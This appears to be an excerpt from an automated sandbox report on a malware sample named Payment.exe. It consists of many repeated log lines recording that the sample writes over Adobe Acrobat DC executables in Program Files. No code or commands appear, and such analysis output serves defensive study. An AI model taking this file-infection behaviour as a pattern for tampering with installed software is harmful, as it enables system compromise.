                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
